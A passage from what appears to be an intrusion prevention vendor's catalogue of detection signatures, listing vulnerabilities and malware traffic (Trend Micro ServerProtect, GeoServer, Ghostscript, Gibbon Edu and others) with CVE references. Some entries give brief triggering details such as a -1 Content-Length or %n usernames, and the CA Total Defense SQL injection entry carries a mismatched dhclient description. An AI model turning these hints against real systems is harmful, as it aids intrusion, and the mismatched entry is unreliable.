Description: Symantec AntiVirus Scan Engine has a buffer overflow vulnerability. A remote attacker can exploit this vulnerability by providing user credentials via the HTTP request containing Content-Length value -1 or 0xffffffff. A succesfull exploitation can allow root/system-level compromise.
Situation: HTTP_CSH-Invalid-Negative-Content-Length-Value
References:
CVE-2005-2758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2758
BID-15001
http://www.securityfocus.com/bid/15001
OSVDB-19854
http://www.osvdb.org/19854
Back to top

Generic-Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF

About this vulnerability: Buffer overflow vulnerability in Trend Micro's ServerProtect
Risk: High
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro's ServerProtect. A crafted RPC call with opnum 0 and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF
Generic_Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF
References:
CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070
BID-22639
http://www.securityfocus.com/bid/22639
Back to top

Generic-Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-BOF

About this vulnerability: Buffer overflow vulnerability in Trend Micro's ServerProtect
Risk: High
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro's ServerProtect. A crafted RPC call with opnum 0 and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS_Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-Access
MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-BOF
References:
CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070
BID-22639
http://www.securityfocus.com/bid/22639
OSVDB-33042
http://www.osvdb.org/33042
Back to top

Generic-Trend-Micro-ServerProtect-RPC-Call-ENG-SendEMail-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Trend Micro's ServerProtect
Risk: High
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro's ServerProtect. A crafted RPC call with opnum 0 with subcode 0x0047 and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-Call-ENG-SendEMail-Buffer-Overflow
References:
CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070
BID-22639
http://www.securityfocus.com/bid/22639
OSVDB-33042
http://www.osvdb.org/33042
Back to top

Generic-Trend-Micro-ServerProtect-RPC-ENG-SetRealTimeScanConfigInfo-BOF

About this vulnerability: Buffer overflow vulnerability in Trend Micro's ServerProtect
Risk: High
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro's ServerProtect. A crafted RPC call with opnum 0 with subcode 0x0004 and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-ENG-SetRealTimeScanConfigInfo-BOF
References:
CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070
BID-22639
http://www.securityfocus.com/bid/22639
OSVDB-33042
http://www.osvdb.org/33042
Back to top

Generic-Trojan-SMTP-Infection-Traffic

About this vulnerability: Generic trojan infection traffic detected
Risk: High
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Malicious traffic detected.
Situation: SMTP_CS-Generic-Trojan-SMTP-Infection-Traffic
Back to top

Generic-Webmin-And-Usermin-Format-String-Vulnerability

About this vulnerability: Detects Webmin and Usermin format string exploits
Risk: Moderate
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Webmin; Usermin
Type: Format String
Description: When an unknown user logs in to Webmin or Usermin, the username argument is unsecurely processed with the Perl 'syslog' facility. Perl 'syslog' uses the sprintf function with the username argument and processes any format specifiers accordingly. This feature can be exploted by giving a username containing %n or %0(large number)d strings.
Situation: HTTP_CRL-Webmin-And-Usermin-Format-String-Vulnerability
References:
CVE-2005-3912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3912
BID-15629
http://www.securityfocus.com/bid/15629
OSVDB-21222
http://www.osvdb.org/21222
Back to top

Generic_CS-Agobot-IRC-Activity

About this vulnerability: Botnet IRC Activity
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Agobot, and its close relatives such as Phatbot, Forbot and XtremBot, build a IRC-controlled botnet.
Situation: Generic_SS-Agobot-IRC-Activity
Back to top

Generic_CS-CA-Embarcadero-Interbase-ConnReq-Stack-Buffer-Overflow

About this vulnerability: An attempt to exploit vulnerability in Embarcadero Interbase detected
Risk: Moderate
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Borland Interbase
Type: Malfunction
Description: Multiple code execution vulnerabilities have been reported in Embarcadero InterBase that could allow remote attackers to execute arbitrary code on the vulnerable system due to insufficient input validation. The vulnerability is due to an error in the handling TCP packets which contain specially crafted "connect" requests (opcode 0x01).
Situation: Generic_CS-Embarcadero-Interbase-ConnReq-Stack-Buffer-Overflow
References:
BID-47644
http://www.securityfocus.com/bid/47644
Back to top

Generic_CS-CA-Total-Defense-Suite-getDBConfigSettings-Credential-Disclosure

About this vulnerability: An attempt to exploit vulnerability in CA Total Defense Suite detected
Risk: Moderate
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: CA Total Defense Suite
Type: Malfunction
Description: An information disclosure vulnerability exists in CA Total Defense Suite that can be reached through a remote web service call. The vulnerability is due to insufficient access control when handling requests for the web service getDBConfigSettings.
Situation: HTTP_CS-CA-Total-Defense-Suite-getDBConfigSettings-Credential-Disclosure
References:
CVE-2011-1655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1655
BID-47356
http://www.securityfocus.com/bid/47356
Back to top

Generic_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability

About this vulnerability: An attempt to exploit vulnerability in CA Total Defense Suite detected
Risk: Moderate
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: CA Total Defense Suite
Type: Malfunction
Description: A flaw exists in ISC DHCP dhclient that facilitates a command injection vulnerability, that could allow remote attackers to execute arbitrary commands on the vulnerable system. The vulnerability is due to an input validation error while parsing a specially crafted response from a DHCP server. The vulnerable code allows some of the special shell escape characters in multiple parameters to be passed verbatim into the client network configuration script, allowing for injection and execution of arbitrary shell commands.
Situation: HTTP_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability
HTTP_CRL-CA-Total-Defense-Suite-SQL-Injection-Vulnerability
References:
CVE-2011-1653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1653
BID-47355
http://www.securityfocus.com/bid/47355
Back to top

Generic_CS-FlawedAmmyy-RAT-C2-Traffic

About this vulnerability: FlawedAmmyy RAT C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: FlawedAmmyy is a powerful remote access trojan (RAT), that has been spread via malicious email messages. This RAT has also been used in highly targeted campaigns.
Situation: Generic_CS-FlawedAmmyy-RAT-C2-Traffic
Back to top

Generic_CS-Quest-Software-Big-Brother-Arbitrary-File-Deletion-And-Overwriting

About this vulnerability: An attempt to exploit vulnerability in Quest Software Big Brother detected
Risk: Moderate
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Quest Software Big Brother
Type: Malfunction
Description: Two directory traversal vulnerabilities exist in bbntd.exe, a component of Quest Software Big Brother. These vulnerabilities allow a remote attacker to delete or overwrite arbitrary files using the "page" and "ack addtag_event" commands, respectively.
Situation: Generic_CS-Quest-Software-Big-Brother-Arbitrary-File-Deletion-And-Overwriting
References:
OSVDB-72347
http://www.osvdb.org/72347
Back to top

Generic_IBM-DB2-Database-Server-Connect-Request-Denial-Of-Service

About this vulnerability: Connect Request Denial of Service vulnerability in IBM DB2
Risk: Moderate
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM DB2
Type: Input Validation
Description: There is a denial of service vulnerability in IBM DB2 Database Server. The flaw is due to insufficient input validation when processing malformed connect data streams. Remote attackers can exploit this vulnerability by sending a malicious Distributed Relational Database Architecture (DRDA) connect data stream to the server. A successful exploitation can cause the server process to enter an infinite loop, resulting in a Denial of Service condition.
Situation: Generic_IBM-DB2-Database-Server-Connect-Request-Denial-Of-Service
References:
CVE-2009-0172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0172
BID-33258
http://www.securityfocus.com/bid/33258
Back to top

Generic_IBM-DB2-Database-Server-Invalid-Data-Stream-Denial-Of-Service

About this vulnerability: Invalid Data Denial of Service in IBM DB2
Risk: Moderate
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM DB2
Type: Input Validation
Description: There is a denial of service vulnerability in IBM DB2 Database Server. The flaw is due to insufficient input validation when processing malformed data streams. Remote authenticated attackers could exploit this vulnerability by sending a malicious Distributed Relational Database Architecture (DRDA) data stream to theserver. In a successful attack, the affected server terminates and is not available until the service is manually restarted.
Situation: Generic_IBM-DB2-Database-Server-Invalid-Data-Stream-Denial-Of-Service
References:
CVE-2009-0173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0173
BID-33258
http://www.securityfocus.com/bid/33258
Back to top

Generic_IBM-WebSphere-Application-Server-Cross-Site-Scripting

About this vulnerability: IBM WebSphere Application Server cross-site scripting
Risk: Low
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-1349-5242
Platform: Generic
Software: IBM WebSphere Application Server
Type: Input Validation
Description: There is a cross-site scripting vulnerability in IBM WebSphere Application Server (WAS). The flaw is due to a lack of validation of user-supplied input data. The flaw may be exploited by malicious users to execute arbitrary HTML and script code on the target user's web browser in the context of a trusted web site. An attack targeting this vulnerability can result in the injection and execution of script code. If code execution is successful, the behavior of the target depends on the intention of the attacker. Unsuccessful attack attempts can either be unnoticed by the target user, or cause incorrect rendering of the affected web pages.
Situation: HTTP_CSU-IBM-WebSphere-Application-Server-Cross-Site-Scripting
Back to top

Generic_Solaris_X86-ShellCode

About this vulnerability: Shellcode for Sun Solaris/x86 operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on Sun Solaris/x86. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-Solaris-X86-Ingreslock
Shared_ShellCode-Solaris-X86-Setuid-Execve
Shared_ShellCode-Solaris-X86-Toupper-Execve
Back to top

Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection

About this vulnerability: A vulnerability in ISC DHCP dhclient
Risk: Moderate
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP dhclient
Type: Script Injection
Description: A flaw exists in ISC DHCP dhclient that facilitates a command injection vulnerability, that could allow remote attackers to execute arbitrary commands on the vulnerable system. The vulnerability is due to an input validation error while parsing a specially crafted response from a DHCP server. The vulnerable code allows some of the special shell escape characters in multiple parameters to be passed verbatim into the client network configuration script, allowing for injection and execution of arbitrary shell commands.
Situation: Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection
BOOTP_CS-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection
References:
CVE-2011-0997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997
BID-47176
http://www.securityfocus.com/bid/47176
OSVDB-71493
http://www.osvdb.org/71493
Back to top

Generic_VMware-Authentication-Server-Denial-Of-Service

About this vulnerability: VMware Authenticaion Server Denial of Service
Risk: Low
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC VMware Workstation; EMC VMware Player
Type: Input Validation
Description: VMware Workstation and Player suffer from a denial of service vulnerability in the authentication daemon (vmware-authd(.exe)). A long USER or PASS command can be used to trigger the condition.
Situation: Generic_VMware-Authentication-Server-Denial-Of-Service
References:
CVE-2009-0177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0177
BID-34373
http://www.securityfocus.com/bid/34373
OSVDB-51180
http://www.osvdb.org/51180
Back to top

GENESIS32-And-GENESIS64-GenBroker.exe-DoS

About this vulnerability: A vulnerability in GENESIS32 and GENESIS64 GenBroker.exe allowing DoS
Risk: High
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Genesis HTTP server
Type: Malfunction
Description: A vulnerability exists in GENESIS32 and GENESIS64 GenBroker.exe which allows an attacker to send a manually crafted packet, allowing for a DoS attack.
Situation: HTTP_CS-GENESIS32-And-GENESIS64-GenBroker.exe-DoS
Back to top

GeoServer-Jiffle-Remote-Code-Execution-CVE-2022-24816

About this vulnerability: A vulnerability in GeoServer
Risk: High
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Platform: Generic
Software: GeoServer
Type: Code Injection
Description: GeoServer versions prior to 1.2.22 are vulnerable to remote code execution without any authentication requirements. The flaw is due to the software allowing Jiffle script execution and including a vulnerable version of the JAI-EXT API.
Situation: HTTP_CRL-GeoServer-Jiffle-Remote-Code-Execution-CVE-2022-24816
References:
CVE-2022-24816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24816
Back to top

GeoServer-Server-Side-Request-Forgery-CVE-2021-40822

About this vulnerability: A vulnerability in GeoServer
Risk: High
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Platform: Generic
Software: GeoServer
Type: Malfunction
Description: A server-side request forgery vulnerability exists in GeoServer versions prior to 2.19.3, 2.18.5, and 2.17.6.
Situation: HTTP_CRL-GeoServer-Server-Side-Request-Forgery-CVE-2021-40822
References:
CVE-2021-40822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40822
Back to top

GeoServer-SQL-Injection-CVE-2023-25157

About this vulnerability: An attempt to exploit a vulnerability in Geoserver detected
Risk: High
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Platform: Generic
Software: GeoServer
Type: Input Validation
Description: GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. It includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore encode functions setting to mitigate "strEndsWith", "strStartsWith" and "PropertyIsLike" misuse and enable the PostGIS DataStore preparedStatements setting to mitigate the "FeatureId" misuse.
Situation: HTTP_CRL-GeoServer-SQL-Injection-CVE-2023-25157
References:
CVE-2023-25157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25157
Back to top

GeoServer-Unauthenticated-Remote-Code-Execution-CVE-2024-36401

About this vulnerability: An attempt to exploit a vulnerability in GeoServer detected
Risk: High
First detected in: sgpkg-ips-1754-5242
Last changed: sgpkg-ips-1756-5242
Platform: Windows; Linux; Unix
Software: GeoServer
Type: Input Validation
Description: A vulnerability in GeoServer, verions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1, which allows remote attackers to execute arbitrary code through multiple OGC request parameters, due to insufficient input validation.
Situation: HTTP_CRL-GeoServer-Unauthenticated-Remote-Code-Execution-CVE-2024-36401
References:
CVE-2024-36401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36401
Back to top

Geovision-Livex-Directory-Traversal

About this vulnerability: An attempt to exploit a vulnerability in GeoVision LiveX detected
Risk: Moderate
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Platform: Generic
Software: GeoVision LiveX
Type: Directory Traversal
Description: A directory traversal vulnerability in the SnapShotToFile method of the GeoVision LiveX ActiveX control allows creating and overwriting arbitrary files.
Situation: File-Text_Geovision-Livex-Directory-Traversal-Vulnerability
References:
CVE-2009-0865
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0865
Back to top

Gestart-Php-Remote-File-Inclusion-Vulnerability

About this vulnerability: A vulnerability in Gestart
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GestArt
Type: Input Validation
Description: A PHP remote file inclusion exists in GestArt aide.php component. Successful exploitation of this issue leads into arbitrary code execution.
Situation: HTTP_CRL-Gestart-Aide-Php-Remote-Code-Execution
References:
CVE-2006-5612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5612
BID-20750
http://www.securityfocus.com/bid/20750
Back to top

GetGo-Download-Manager-HTTP-Response-Buffer-Overflow

About this vulnerability: A GetGo Download Manager HTTP Response Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GetGo
Type: Buffer Overflow
Description: A buffer overflow vulnerability in GetGo Download Manager, versions 4.9.0.1982 and before, which allows remote attackers to execute arbitrary code by persuading the victim to download a file from a malicious server.
Situation: HTTP_SLS-GetGo-Download-Manager-HTTP-Response-Buffer-Overflow
References:
CVE-2014-2206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2206
OSVDB-103910
http://www.osvdb.org/103910
Back to top

GetSimpleCMS-Unauthenticated-RCE

About this vulnerability: A vulnerability in GetSimpleCMS
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GetSimpleCMS
Type: Input Validation
Description: A vulnerability in GetSimpleCMS, versions 3.3.15 and before, which allows remote attackers to execute arbitrary code due to improper user input validation.
Situation: HTTP_CRL-GetSimpleCMS-Unauthenticated-RCE
References:
CVE-2019-11231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
Back to top

Geutebruck-Instantrec-Remote-Command-Execution

About this vulnerability: A vulnerability in Geutebruck devices.
Risk: High
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Unix; Linux
Software: Geutebruck
Type: Buffer Overflow
Description: A vulnerability in Geutebruck devices, versions G-Cam EEC-2xxx, G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx, running firmware versions 1.12.0.27, 1.12.13.2 and 1.12.14.5, which allows remote attackers to execute arbitrary code via the action parameter to instantrec.cgi.
Situation: HTTP_CRL-Geutebruck-Instantrec-Remote-Command-Execution
References:
CVE-2021-33549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33549
Back to top

Geutebruck-Multiple-RCE-CVE-2021-335xx

About this vulnerability: A vulnerability in Geutebruck devices.
Risk: High
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Unix; Linux
Software: Geutebruck
Type: Input Validation
Description: A vulnerability in Geutebruck devices, versions G-Cam EEC-2xxx, G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx, running firmware versions 1.12.0.27 and before, 1.12.13.2 and 1.12.14.5, which allows remote attackers to execute arbitrary commands by a basic authentication bypass and multiple command execution vulnerabilities within various parameters. CVE-2021-33543, CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554.
Situation: HTTP_CRL-Geutebruck-Multiple-RCE-CVE-2021-335xx
References:
CVE-2021-33543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33543
Back to top

Geutebruck-testaction-RCE

About this vulnerability: A vulnerability in Geutebruck camera firmware
Risk: High
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Geutebruck
Type: Input Validation
Description: There exists a vulnerability in Geutebruck devices G-Cam EEC-2xxx, G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx with firmware versions 1.12.0.25 and below, and version 1.12.13.2, and version 1.12.14.5, which allows remote attckers to execute arbitrary commands via the server parameter, when the 'type' GET parameter is set to 'ntp'.
Situation: HTTP_CSU-Geutebruck-testaction-RCE
References:
CVE-2020-16205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16205
Back to top

Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow

About this vulnerability: A Geutebrueck GCore GCoreServer.exe Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Geutebrueck GCore
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Geutebrueck GCore GCoreServer.exe, versions 1.3.8.42 and 1.4.2.37, which allows remote attackers to execute arbitrary code via a long URI in a GET request.
Situation: Generic_CS-Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow
References:
CVE-2017-11517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11517
Back to top

Gh0st-C2-Server-Buffer-Overflow

About this vulnerability: A vulnerability in the Gh0st C2 Server.
Risk: High
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1461-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: A buffer overflow vulnerability in the Gh0st C2 server which allows remote attackers to gain control of the target machine, and execute arbitrary code.
Situation: HTTP_CS-Gh0st-C2-Server-Buffer-Overflow
Back to top

Gheg-Spambot

About this vulnerability: Gheg spambot is a template-based spamming engine
Risk: High
First detected in: sgpkg-ips-270-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Gheg spambot
Type: Backdoor
Description: Gheg spambot is a template-based spamming engine.
Situation: HTTPS_CS-Gheg-Spambot
Back to top

Ghost-CMS-Content-API-Filtering-Information-Disclosure

About this vulnerability: A vulnerability in Ghost Foundation Ghost
Risk: Moderate
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Platform: Generic
Software: Ghost Foundation Ghost
Type: Input Validation
Description: Improper input validation when using filtering on the Content API endpoints causes a vulnerability in the Ghost CMS. A successful exploit allows an attacker to access information on the target system.
Situation: HTTP_CRL-Ghost-CMS-Content-API-Filtering-Information-Disclosure
References:
CVE-2023-31133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31133
Back to top

Ghost-CMS-Static-theme.js-Path-Traversal

About this vulnerability: A vulnerability in Ghost Foundation Ghost
Risk: Moderate
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Platform: Generic
Software: Ghost Foundation Ghost
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Ghost CMS. The vulnerability is due to improper validation of the user-supplied path in the static-theme.js component. A remote, unauthorized attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in disclosing sensitive information.
Situation: HTTP_CSU-Ghost-CMS-Static-theme.js-Path-Traversal
References:
CVE-2023-32235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32235
Back to top

GhostDNS

About this vulnerability: GhostDNS campaign
Risk: High
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic DNS server
Type: Dns Spoof
Description: GhostDNS is a malware campaign targeting insecure routers. It modifies the DNS settings on the router to reroute traffic to malicious websites.
Situation: HTTP_CSU-DNSChanger-Scan-URL
File-Text_DNSChanger-Injected-Iframe
Back to top

Ghostscript-Eps-File-Command-Execution-CVE-2017-8291

About this vulnerability: A vulnerability in Ghostscript
Risk: High
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1485-5242
Platform: Generic
Software: Ghostscript
Type: Input Validation
Description: A type confusion vulnerability has been reported in the Artifex Ghostscript versions up to and including 9.21. Processing a maliciously crafted EPS file with a vulnerable version of the software can result in arbitrary command execution.
Situation: File-TextId_Ghostscript-File-Command-Execution
References:
CVE-2017-8291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8291
Back to top

Ghostscript-Failed-Restore-Command-Execution-CVE-2018-16509

About this vulnerability: An attempt to exploit a vulnerability in Ghostscript detected
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Ghostscript
Type: Input Validation
Description: An issue was discovered in Artifex Ghostscript before 9.24. Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could be used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction.
Situation: File-Text_Ghostscript-File-Command-Execution
References:
CVE-2018-16509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16509
Back to top

Ghostscript-Format-String-Exploitation-CVE-2024-29510

About this vulnerability: An attempt to exploit a vulnerability in Ghostscript detected
Risk: High
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1750-5242
Platform: Generic
Software: Ghostscript
Type: Input Validation
Description: CVE-2024-29510 is a format string vulnerability in Ghostscript prior to 10.03.0, which can be exploited to bypass the "-dSAFER" sandbox and gain code execution. It has significant impact on web-applications and other services offering document conversion and preview functionalities as these often use Ghostscript under the hood.
Situation: File-Text_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-Text_Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-TextId_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-TextId_Ghostscript-Format-String-Exploitation-CVE-2024-29510
References:
CVE-2024-29510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29510
Back to top

Gibbon-Edu-Arbitrary-File-Write-CVE-2023-45878

About this vulnerability: A vulnerability in Gibbon Edu
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: Gibbon Edu
Type: Malfunction
Description: An arbitrary file write vulnerability has been reported in Gibbon Edu versions up to and including 25.0.1. The vulnerable endpoint rubrics_visualise_saveAjax.php does not require authentication and allows file uploads. An attacker could exploit this vulnerability to achieve remote code execution by uploading arbitrary PHP files.
Situation: HTTP_CRL-Gibbon-Edu-Arbitrary-File-Write-CVE-2023-45878
References:
CVE-2023-45878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45878
Back to top

Gibbon-School-Platform-Authenticated-PHP-Deserialization-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Gibbon Edu detected
Risk: High
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1715-5242
Platform: Generic
Software: Gibbon Edu
Type: Input Validation
Description: A vulnerability in Gibbon online school platform, versions 26.0.00 and before, that allows remote attackers to execute arbitrary code by conducting a PHP deserialization attacks via columnOrder in a POST request to the endpoint /modules/System%20Admin/import_run.php&type=externalAssessment&step=4.
Situation: HTTP_CRL-Gibbon-School-Platform-Authenticated-PHP-Deserialization-Vulnerability
References:
CVE-2024-24725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24725
Back to top

Gila-CMS-DeleteAction-Local-File-Inclusion

About this vulnerability: A vulnerability in Gila CMS Gila
Risk: High
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Gila CMS
Type: Directory Traversal
Description: A local file inclusion vulnerability has been reported in Gila CMS. The vulnerability is due to improper sanitization of user supplied data in the function deleteAction(). A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted server. Successful exploitation of the vulnerability could lead to arbitrary code execution under the security context of the service.
Situation: HTTP_CRL-Gila-CMS-DeleteAction-Local-File-Inclusion
References:
CVE-2020-5513
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5513
Back to top

Gila-CMS-Image-Upload-Remote-Code-Execution

About this vulnerability: A vulnerability in Gila CMS Gila
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Gila CMS
Type: Input Validation
Description: Improper validation of received files during image upload causes a vulnerability in Gila CMS. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.
Situation: HTTP_CSU-Gila-CMS-Image-Upload-Remote-Code-Execution
References:
CVE-2020-5514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5514
Back to top

Gila-CMS-Media-assets.php-Path-Traversal

About this vulnerability: A vulnerability in Gila CMS
Risk: Moderate
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Gila CMS
Type: Directory Traversal
Description: There has been reported a path traversal vulnerability in Gila CMS. Successful exploitation could lead in information disclosure.
